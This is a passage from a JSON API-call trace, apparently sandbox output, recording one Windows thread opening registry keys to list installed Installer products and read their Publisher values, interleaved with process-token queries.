"0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 935 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 936 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "5" }, { "name": "Name", "value": "C49115752914EB648805A289B86E3BAB" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 937 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 938 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 939 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 940 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 941 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 942 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 943 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 944 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 945 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 946 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 947 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 948 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 949 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 950 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 951 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 952 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 953 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 954 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties" } ], "repeated": 0, "id": 955 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 956 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 957 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 958 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 959 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 960 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 961 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "6" }, { "name": "Name", "value": "D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 962 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 963 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 964 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 965 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 966 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 967 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 968 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 969 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 970 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 971 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 972 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 973 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 974 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 975 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 976 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 977 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 978 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 979 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties" } ], "repeated": 0, "id": 980 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 981 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 982 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 983 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 984 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 985 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 986 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "7" }, { "name": "Name", "value": "DEDD26948C27133438B0903EEA696564" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 987 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 988 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 